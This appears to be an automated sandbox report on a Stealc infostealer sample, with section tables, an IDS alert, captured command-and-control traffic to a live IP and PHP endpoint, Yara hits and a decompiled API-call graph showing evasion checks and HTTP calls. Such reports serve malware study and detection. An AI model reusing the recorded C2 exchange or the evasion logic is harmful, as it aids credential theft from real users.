                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x25d050         0x64          .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x25d1f8         0x8           .idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                   | 0x1000 | 0x25b000 | 0x22800 | fd93384c9ea43104f47548e8e90558f2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                   | 0x25e000 | 0x2a1000 | 0x200 | f3f087bdc73a381427c1e28c970e022a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  gbgxsggn | 0x4ff000 | 0x1a0000 | 0x19f200 | a4a8a5ef8b27c70f3e5acbd4a92d539c | False | 0.9950286764152364 | data | 7.953932899320452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  lycvdkjm | 0x69f000 | 0x1000 | 0x400 | 04c2fa35af70099414bab8910d96b267 | False | 0.8134765625 | data | 6.274237333962727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant | 0x6a0000 | 0x3000 | 0x2200 | 76bb3e1adaeeb6f418bc4c149110dc11 | False | 0.06939338235294118 | DOS executable (COM) | 0.8118838505904251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  DLL           Import
                  kernel32.dll  lstrcpy
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-10-01T11:06:56.881309+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 1, 2024 11:06:55.945058107 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:55.950764894 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 1, 2024 11:06:55.950851917 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:55.950983047 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:55.958194017 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 1, 2024 11:06:56.653424025 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 1, 2024 11:06:56.653573036 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:56.656116009 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:56.660963058 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 1, 2024 11:06:56.881215096 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 1, 2024 11:06:56.881309032 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 1, 2024 11:06:59.832824945 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  • 185.215.113.37
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6968 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Oct 1, 2024 11:06:55.950983047 CEST | 89 | OUT | GET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 1, 2024 11:06:56.653424025 CEST | 203 | IN | HTTP/1.1 200 OK
                  Date: Tue, 01 Oct 2024 09:06:56 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 1, 2024 11:06:56.656116009 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
                  Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="hwid"1BF69E3472EB3294564547------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build"doma------IEBFHCAKFBGDHIDHIDBK--
                  Oct 1, 2024 11:06:56.881215096 CEST | 210 | IN | HTTP/1.1 200 OK
                  Date: Tue, 01 Oct 2024 09:06:56 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=

                  Target ID:0
                  Start time:05:06:52
                  Start date:01/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x470000
                  File size:1'856'512 bytes
                  MD5 hash:7104794E5BC6D9668DF3A837983E43DF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                    Execution Graph

                    Execution Coverage:7.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.7%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
                    execution_graph 13432 4869f0 13477 472260 13432->13477 13456 486a64 13457 48a9b0 4 API calls 13456->13457 13458 486a6b 13457->13458 13459 48a9b0 4 API calls 13458->13459 13460 486a72 13459->13460 13461 48a9b0 4 API calls 13460->13461 13462 486a79 13461->13462 13463 48a9b0 4 API calls 13462->13463 13464 486a80 13463->13464 13629 48a8a0 13464->13629 13466 486b0c 13633 486920 GetSystemTime 13466->13633 13468 486a89 13468->13466 13469 486ac2 OpenEventA 13468->13469 13471 486ad9 13469->13471 13472 486af5 CloseHandle Sleep 13469->13472 13476 486ae1 CreateEventA 13471->13476 13474 486b0a 13472->13474 13474->13468 13476->13466 13830 4745c0 13477->13830 13479 472274 13480 4745c0 2 API calls 13479->13480 13481 47228d 13480->13481 13482 4745c0 2 API calls 13481->13482 13483 4722a6 13482->13483 13484 4745c0 2 API calls 13483->13484 13485 4722bf 13484->13485 13486 4745c0 2 API calls 13485->13486 13487 4722d8 13486->13487 13488 4745c0 2 API calls 13487->13488 13489 4722f1 13488->13489 13490 4745c0 2 API calls 13489->13490 13491 47230a 13490->13491 13492 4745c0 2 API calls 13491->13492 13493 472323 13492->13493 13494 4745c0 2 API calls 13493->13494 13495 47233c 13494->13495 13496 4745c0 2 API calls 13495->13496 13497 472355 13496->13497 13498 4745c0 2 API calls 13497->13498 13499 47236e 13498->13499 13500 4745c0 2 API calls 13499->13500 13501 472387 13500->13501 13502 4745c0 2 API calls 13501->13502 13503 4723a0 13502->13503 13504 4745c0 2 API calls 13503->13504 13505 4723b9 13504->13505 13506 4745c0 2 API calls 13505->13506 13507 4723d2 13506->13507 13508 4745c0 2 API calls 13507->13508 13509 4723eb 13508->13509 13510 4745c0 2 API calls 13509->13510 13511 472404 13510->13511 13512 4745c0 2 API calls 13511->13512 13513 47241d 13512->13513 13514 4745c0 2 API calls 13513->13514 13515 472436 13514->13515 13516 4745c0 2 API calls 13515->13516 13517 47244f 13516->13517 13518 4745c0 2 API calls 13517->13518 13519 472468 13518->13519 13520 4745c0 2 API calls 
13519->13520 13521 472481 13520->13521 13522 4745c0 2 API calls 13521->13522 13523 47249a 13522->13523 13524 4745c0 2 API calls 13523->13524 13525 4724b3 13524->13525 13526 4745c0 2 API calls 13525->13526 13527 4724cc 13526->13527 13528 4745c0 2 API calls 13527->13528 13529 4724e5 13528->13529 13530 4745c0 2 API calls 13529->13530 13531 4724fe 13530->13531 13532 4745c0 2 API calls 13531->13532 13533 472517 13532->13533 13534 4745c0 2 API calls 13533->13534 13535 472530 13534->13535 13536 4745c0 2 API calls 13535->13536 13537 472549 13536->13537 13538 4745c0 2 API calls 13537->13538 13539 472562 13538->13539 13540 4745c0 2 API calls 13539->13540 13541 47257b 13540->13541 13542 4745c0 2 API calls 13541->13542 13543 472594 13542->13543 13544 4745c0 2 API calls 13543->13544 13545 4725ad 13544->13545 13546 4745c0 2 API calls 13545->13546 13547 4725c6 13546->13547 13548 4745c0 2 API calls 13547->13548 13549 4725df 13548->13549 13550 4745c0 2 API calls 13549->13550 13551 4725f8 13550->13551 13552 4745c0 2 API calls 13551->13552 13553 472611 13552->13553 13554 4745c0 2 API calls 13553->13554 13555 47262a 13554->13555 13556 4745c0 2 API calls 13555->13556 13557 472643 13556->13557 13558 4745c0 2 API calls 13557->13558 13559 47265c 13558->13559 13560 4745c0 2 API calls 13559->13560 13561 472675 13560->13561 13562 4745c0 2 API calls 13561->13562 13563 47268e 13562->13563 13564 489860 13563->13564 13835 489750 GetPEB 13564->13835 13566 489868 13567 48987a 13566->13567 13568 489a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13566->13568 13573 48988c 21 API calls 13567->13573 13569 489b0d 13568->13569 13570 489af4 GetProcAddress 13568->13570 13571 489b46 13569->13571 13572 489b16 GetProcAddress GetProcAddress 13569->13572 13570->13569 13574 489b68 13571->13574 13575 489b4f GetProcAddress 13571->13575 13572->13571 13573->13568 13576 489b89 13574->13576 13577 489b71 GetProcAddress 13574->13577 13575->13574 13578 486a00 13576->13578 13579 489b92 GetProcAddress 
GetProcAddress 13576->13579 13577->13576 13580 48a740 13578->13580 13579->13578 13581 48a750 13580->13581 13582 486a0d 13581->13582 13583 48a77e lstrcpy 13581->13583 13584 4711d0 13582->13584 13583->13582 13585 4711e8 13584->13585 13586 471217 13585->13586 13587 47120f ExitProcess 13585->13587 13588 471160 GetSystemInfo 13586->13588 13589 471184 13588->13589 13590 47117c ExitProcess 13588->13590 13591 471110 GetCurrentProcess VirtualAllocExNuma 13589->13591 13592 471141 ExitProcess 13591->13592 13593 471149 13591->13593 13836 4710a0 VirtualAlloc 13593->13836 13596 471220 13840 4889b0 13596->13840 13599 471249 __aulldiv 13600 47129a 13599->13600 13601 471292 ExitProcess 13599->13601 13602 486770 GetUserDefaultLangID 13600->13602 13603 486792 13602->13603 13604 4867d3 13602->13604 13603->13604 13605 4867cb ExitProcess 13603->13605 13606 4867ad ExitProcess 13603->13606 13607 4867c1 ExitProcess 13603->13607 13608 4867a3 ExitProcess 13603->13608 13609 4867b7 ExitProcess 13603->13609 13610 471190 13604->13610 13611 4878e0 3 API calls 13610->13611 13613 47119e 13611->13613 13612 4711cc 13617 487850 GetProcessHeap RtlAllocateHeap GetUserNameA 13612->13617 13613->13612 13614 487850 3 API calls 13613->13614 13615 4711b7 13614->13615 13615->13612 13616 4711c4 ExitProcess 13615->13616 13618 486a30 13617->13618 13619 4878e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13618->13619 13620 486a43 13619->13620 13621 48a9b0 13620->13621 13842 48a710 13621->13842 13623 48a9c1 lstrlen 13625 48a9e0 13623->13625 13624 48aa18 13843 48a7a0 13624->13843 13625->13624 13628 48a9fa lstrcpy lstrcat 13625->13628 13627 48aa24 13627->13456 13628->13624 13631 48a8bb 13629->13631 13630 48a90b 13630->13468 13631->13630 13632 48a8f9 lstrcpy 13631->13632 13632->13630 13847 486820 13633->13847 13635 48698e 13636 486998 sscanf 13635->13636 13876 48a800 13636->13876 13638 4869aa SystemTimeToFileTime SystemTimeToFileTime 13639 4869ce 13638->13639 13640 4869e0 13638->13640 13639->13640 13641 4869d8 
ExitProcess 13639->13641 13642 485b10 13640->13642 13643 485b1d 13642->13643 13644 48a740 lstrcpy 13643->13644 13645 485b2e 13644->13645 13878 48a820 lstrlen 13645->13878 13648 48a820 2 API calls 13649 485b64 13648->13649 13650 48a820 2 API calls 13649->13650 13651 485b74 13650->13651 13882 486430 13651->13882 13654 48a820 2 API calls 13655 485b93 13654->13655 13656 48a820 2 API calls 13655->13656 13657 485ba0 13656->13657 13658 48a820 2 API calls 13657->13658 13659 485bad 13658->13659 13660 48a820 2 API calls 13659->13660 13661 485bf9 13660->13661 13891 4726a0 13661->13891 13669 485cc3 13670 486430 lstrcpy 13669->13670 13671 485cd5 13670->13671 13672 48a7a0 lstrcpy 13671->13672 13673 485cf2 13672->13673 13674 48a9b0 4 API calls 13673->13674 13675 485d0a 13674->13675 13676 48a8a0 lstrcpy 13675->13676 13677 485d16 13676->13677 13678 48a9b0 4 API calls 13677->13678 13679 485d3a 13678->13679 13680 48a8a0 lstrcpy 13679->13680 13681 485d46 13680->13681 13682 48a9b0 4 API calls 13681->13682 13683 485d6a 13682->13683 13684 48a8a0 lstrcpy 13683->13684 13685 485d76 13684->13685 13686 48a740 lstrcpy 13685->13686 13687 485d9e 13686->13687 14617 487500 GetWindowsDirectoryA 13687->14617 13690 48a7a0 lstrcpy 13691 485db8 13690->13691 14627 474880 13691->14627 13693 485dbe 14772 4817a0 13693->14772 13695 485dc6 13696 48a740 lstrcpy 13695->13696 13697 485de9 13696->13697 13698 471590 lstrcpy 13697->13698 13699 485dfd 13698->13699 14788 475960 13699->14788 13701 485e03 14932 481050 13701->14932 13703 485e0e 13704 48a740 lstrcpy 13703->13704 13705 485e32 13704->13705 13706 471590 lstrcpy 13705->13706 13707 485e46 13706->13707 13708 475960 34 API calls 13707->13708 13709 485e4c 13708->13709 14936 480d90 13709->14936 13711 485e57 13712 48a740 lstrcpy 13711->13712 13713 485e79 13712->13713 13714 471590 lstrcpy 13713->13714 13715 485e8d 13714->13715 13716 475960 34 API calls 13715->13716 13717 485e93 13716->13717 14943 480f40 13717->14943 13719 485e9e 13720 471590 lstrcpy 13719->13720 
13721 485eb5 13720->13721 14948 481a10 13721->14948 13723 485eba 13724 48a740 lstrcpy 13723->13724 13725 485ed6 13724->13725 15292 474fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13725->15292 13727 485edb 13728 471590 lstrcpy 13727->13728 13729 485f5b 13728->13729 15299 480740 13729->15299 13731 485f60 13732 48a740 lstrcpy 13731->13732 13733 485f86 13732->13733 13734 471590 lstrcpy 13733->13734 13735 485f9a 13734->13735 13736 475960 34 API calls 13735->13736 13737 485fa0 13736->13737 13831 4745d1 RtlAllocateHeap 13830->13831 13833 474621 VirtualProtect 13831->13833 13833->13479 13835->13566 13837 4710c2 ctype 13836->13837 13838 4710fd 13837->13838 13839 4710e2 VirtualFree 13837->13839 13838->13596 13839->13838 13841 471233 GlobalMemoryStatusEx 13840->13841 13841->13599 13842->13623 13845 48a7c2 13843->13845 13844 48a7ec 13844->13627 13845->13844 13846 48a7da lstrcpy 13845->13846 13846->13844 13848 48a740 lstrcpy 13847->13848 13849 486833 13848->13849 13850 48a9b0 4 API calls 13849->13850 13851 486845 13850->13851 13852 48a8a0 lstrcpy 13851->13852 13853 48684e 13852->13853 13854 48a9b0 4 API calls 13853->13854 13855 486867 13854->13855 13856 48a8a0 lstrcpy 13855->13856 13857 486870 13856->13857 13858 48a9b0 4 API calls 13857->13858 13859 48688a 13858->13859 13860 48a8a0 lstrcpy 13859->13860 13861 486893 13860->13861 13862 48a9b0 4 API calls 13861->13862 13863 4868ac 13862->13863 13864 48a8a0 lstrcpy 13863->13864 13865 4868b5 13864->13865 13866 48a9b0 4 API calls 13865->13866 13867 4868cf 13866->13867 13868 48a8a0 lstrcpy 13867->13868 13869 4868d8 13868->13869 13870 48a9b0 4 API calls 13869->13870 13871 4868f3 13870->13871 13872 48a8a0 lstrcpy 13871->13872 13873 4868fc 13872->13873 13874 48a7a0 lstrcpy 13873->13874 13875 486910 13874->13875 13875->13635 13877 48a812 13876->13877 13877->13638 13879 48a83f 13878->13879 13880 485b54 13879->13880 13881 48a87b lstrcpy 13879->13881 13880->13648 13881->13880 13883 48a8a0 lstrcpy 13882->13883 13884 486443 13883->13884 
13885 48a8a0 lstrcpy 13884->13885 13886 486455 13885->13886 13887 48a8a0 lstrcpy 13886->13887 13888 486467 13887->13888 13889 48a8a0 lstrcpy 13888->13889 13890 485b86 13889->13890 13890->13654 13892 4745c0 2 API calls 13891->13892 13893 4726b4 13892->13893 13894 4745c0 2 API calls 13893->13894 13895 4726d7 13894->13895 13896 4745c0 2 API calls 13895->13896 13897 4726f0 13896->13897 13898 4745c0 2 API calls 13897->13898 13899 472709 13898->13899 13900 4745c0 2 API calls 13899->13900 13901 472736 13900->13901 13902 4745c0 2 API calls 13901->13902 13903 47274f 13902->13903 13904 4745c0 2 API calls 13903->13904 13905 472768 13904->13905 13906 4745c0 2 API calls 13905->13906 13907 472795 13906->13907 13908 4745c0 2 API calls 13907->13908 13909 4727ae 13908->13909 13910 4745c0 2 API calls 13909->13910 13911 4727c7 13910->13911 13912 4745c0 2 API calls 13911->13912 13913 4727e0 13912->13913 13914 4745c0 2 API calls 13913->13914 13915 4727f9 13914->13915 13916 4745c0 2 API calls 13915->13916 13917 472812 13916->13917 13918 4745c0 2 API calls 13917->13918 13919 47282b 13918->13919 13920 4745c0 2 API calls 13919->13920 13921 472844 13920->13921 13922 4745c0 2 API calls 13921->13922 13923 47285d 13922->13923 13924 4745c0 2 API calls 13923->13924 13925 472876 13924->13925 13926 4745c0 2 API calls 13925->13926 13927 47288f 13926->13927 13928 4745c0 2 API calls 13927->13928 13929 4728a8 13928->13929 13930 4745c0 2 API calls 13929->13930 13931 4728c1 13930->13931 13932 4745c0 2 API calls 13931->13932 13933 4728da 13932->13933 13934 4745c0 2 API calls 13933->13934 13935 4728f3 13934->13935 13936 4745c0 2 API calls 13935->13936 13937 47290c 13936->13937 13938 4745c0 2 API calls 13937->13938 13939 472925 13938->13939 13940 4745c0 2 API calls 13939->13940 13941 47293e 13940->13941 13942 4745c0 2 API calls 13941->13942 13943 472957 13942->13943 13944 4745c0 2 API calls 13943->13944 13945 472970 13944->13945 13946 4745c0 2 API calls 13945->13946 13947 472989 13946->13947 13948 4745c0 2 
API calls 13947->13948 13949 4729a2 13948->13949 13950 4745c0 2 API calls 13949->13950 13951 4729bb 13950->13951 13952 4745c0 2 API calls 13951->13952 13953 4729d4 13952->13953 13954 4745c0 2 API calls 13953->13954 13955 4729ed 13954->13955 13956 4745c0 2 API calls 13955->13956 13957 472a06 13956->13957 13958 4745c0 2 API calls 13957->13958 13959 472a1f 13958->13959 13960 4745c0 2 API calls 13959->13960 13961 472a38 13960->13961 13962 4745c0 2 API calls 13961->13962 13963 472a51 13962->13963 13964 4745c0 2 API calls 13963->13964 13965 472a6a 13964->13965 13966 4745c0 2 API calls 13965->13966 13967 472a83 13966->13967 13968 4745c0 2 API calls 13967->13968 13969 472a9c 13968->13969 13970 4745c0 2 API calls 13969->13970 13971 472ab5 13970->13971 13972 4745c0 2 API calls 13971->13972 13973 472ace 13972->13973 13974 4745c0 2 API calls 13973->13974 13975 472ae7 13974->13975 13976 4745c0 2 API calls 13975->13976 13977 472b00 13976->13977 13978 4745c0 2 API calls 13977->13978 13979 472b19 13978->13979 13980 4745c0 2 API calls 13979->13980 13981 472b32 13980->13981 13982 4745c0 2 API calls 13981->13982 13983 472b4b 13982->13983 13984 4745c0 2 API calls 13983->13984 13985 472b64 13984->13985 13986 4745c0 2 API calls 13985->13986 13987 472b7d 13986->13987 13988 4745c0 2 API calls 13987->13988 13989 472b96 13988->13989 13990 4745c0 2 API calls 13989->13990 13991 472baf 13990->13991 13992 4745c0 2 API calls 13991->13992 13993 472bc8 13992->13993 13994 4745c0 2 API calls 13993->13994 13995 472be1 13994->13995 13996 4745c0 2 API calls 13995->13996 13997 472bfa 13996->13997 13998 4745c0 2 API calls 13997->13998 13999 472c13 13998->13999 14000 4745c0 2 API calls 13999->14000 14001 472c2c 14000->14001 14002 4745c0 2 API calls 14001->14002 14003 472c45 14002->14003 14004 4745c0 2 API calls 14003->14004 14005 472c5e 14004->14005 14006 4745c0 2 API calls 14005->14006 14007 472c77 14006->14007 14008 4745c0 2 API calls 14007->14008 14009 472c90 14008->14009 14010 4745c0 2 API calls 
14009->14010 14011 472ca9 14010->14011 14012 4745c0 2 API calls 14011->14012 14013 472cc2 14012->14013 14014 4745c0 2 API calls 14013->14014 14015 472cdb 14014->14015 14016 4745c0 2 API calls 14015->14016 14017 472cf4 14016->14017 14018 4745c0 2 API calls 14017->14018 14019 472d0d 14018->14019 14020 4745c0 2 API calls 14019->14020 14021 472d26 14020->14021 14022 4745c0 2 API calls 14021->14022 14023 472d3f 14022->14023 14024 4745c0 2 API calls 14023->14024 14025 472d58 14024->14025 14026 4745c0 2 API calls 14025->14026 14027 472d71 14026->14027 14028 4745c0 2 API calls 14027->14028 14029 472d8a 14028->14029 14030 4745c0 2 API calls 14029->14030 14031 472da3 14030->14031 14032 4745c0 2 API calls 14031->14032 14033 472dbc 14032->14033 14034 4745c0 2 API calls 14033->14034 14035 472dd5 14034->14035 14036 4745c0 2 API calls 14035->14036 14037 472dee 14036->14037 14038 4745c0 2 API calls 14037->14038 14039 472e07 14038->14039 14040 4745c0 2 API calls 14039->14040 14041 472e20 14040->14041 14042 4745c0 2 API calls 14041->14042 14043 472e39 14042->14043 14044 4745c0 2 API calls 14043->14044 14045 472e52 14044->14045 14046 4745c0 2 API calls 14045->14046 14047 472e6b 14046->14047 14048 4745c0 2 API calls 14047->14048 14049 472e84 14048->14049 14050 4745c0 2 API calls 14049->14050 14051 472e9d 14050->14051 14052 4745c0 2 API calls 14051->14052 14053 472eb6 14052->14053 14054 4745c0 2 API calls 14053->14054 14055 472ecf 14054->14055 14056 4745c0 2 API calls 14055->14056 14057 472ee8 14056->14057 14058 4745c0 2 API calls 14057->14058 14059 472f01 14058->14059 14060 4745c0 2 API calls 14059->14060 14061 472f1a 14060->14061 14062 4745c0 2 API calls 14061->14062 14063 472f33 14062->14063 14064 4745c0 2 API calls 14063->14064 14065 472f4c 14064->14065 14066 4745c0 2 API calls 14065->14066 14067 472f65 14066->14067 14068 4745c0 2 API calls 14067->14068 14069 472f7e 14068->14069 14070 4745c0 2 API calls 14069->14070 14071 472f97 14070->14071 14072 4745c0 2 API calls 14071->14072 
[Execution graph excerpt: Graphviz node/edge text extracted from the rendered call-graph image. The edge wiring (nnnnn->nnnnn) is not recoverable in linear text; the node addresses and API calls shown in this part of the graph are listed below.]

472fb0 .. 4745a9: a long chain of nodes, each calling 4745c0 (2 API calls)
489c10, 489c20 (43 API calls); 48a036 (8 API calls), 48a153 (8 API calls), 48a2a5 (6 API calls), 48a344 (9 API calls), 48a522 (10 API calls), interleaved with GetProcAddress blocks at 48a0cc, 48a21f, 48a428 (5 calls each), 48a4ab, 48a4e5 (2 calls each), 48a61b, 48a6a7 (4 calls each), 48a686 (1 call)
471590, 471670, 48a740, 48a7a0, 48a8a0: lstrcpy; 48a820: lstrlen, lstrcpy; 48a920 / 48a968: lstrcpy, lstrcat; 48a9b0: 4 API calls; 48aad0, 48a800: no API calls labelled
485510 .. 485a52: StrCmpCA at 485643, 4856a0, 48578a, 485856, 48593f, 485a0b; Sleep at 485a16; 4852c0 (25 API calls); 4851f0 (20 API calls)
487500 (6 API calls): 487553 GetVolumeInformationA; 4875fc GetProcessHeap, RtlAllocateHeap; 487628 wsprintfA
4747b0 / 4747c6: 474838 lstrlen; 474848 InternetCrackUrlA
474899 .. 474f57: 47490b InternetOpenA, StrCmpCA; 474aa3 InternetConnectA; 474ad3 HttpOpenRequestA; 474de7, 474e03 lstrlen; 474e13 HttpSendRequestA; 474e32 InternetReadFile; 474e67, 474ebe, 474ecb InternetCloseHandle; 474f27 ctype
475979 .. 47604f: 4759ee InternetOpenA, StrCmpCA; 475b7c InternetConnectA; 475bac HttpOpenRequestA; 475e70, 475eae, 475ed7, 475ef0, 475f1a lstrlen; 475e81 lstrlen, GetProcessHeap, RtlAllocateHeap; 475f2a HttpSendRequestA; 475f35 InternetReadFile; 475f6a, 475fb6, 475fc3 InternetCloseHandle; 47601f ctype
488b60 (3 API calls): 488b82 GetSystemTime
479ac0 (4 API calls): CryptStringToBinaryA; 479af9 LocalAlloc; 479b14 CryptStringToBinaryA; 479b39 LocalFree
4817c4 StrCmpCA; 4817cf ExitProcess; StrCmpCA at 48185d, 48187f, 4818ad, 4818cf, 4818f1, 481913, 481932, 481951, 481970
480db7: StrCmpCA at 480e27, 480e67, 480ea4; 480f67: StrCmpCA at 480fb2; 480759: StrCmpCA at 480799, 480865, 48099c; 47fb00, 480030, 480250, 4798d0: no API calls labelled
481a26 .. 482699 (chain of 48a9b0 / 48a8a0 nodes calling into): 487690 GetProcessHeap, RtlAllocateHeap; 4876c6 RegOpenKeyExA; 4876e7 RegQueryValueExA; 487704 RegCloseKey; 4877c0 GetCurrentProcess, IsWow64Process; 487850 (3 API calls); 4878e0 (3 API calls); 487980 GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA; 487a30 GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation; 487a9a wsprintfA; 487b00 GetUserDefaultLocaleName; 487b90; 487d80 GetSystemPowerStatus; 48207e GetCurrentProcessId; 489470 OpenProcess; 487e00 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA; 487f60; 487ed0 GetSystemInfo, wsprintfA; 488100 GetProcessHeap, RtlAllocateHeap; 4887c0; 4881f0; 488320 (17 API calls); 488680; 48265a lstrlen; 485190; 488d20 LocalAlloc
475009 InternetOpenUrlA; 47502a InternetReadFile; 4750a0 InternetCloseHandle, InternetCloseHandle
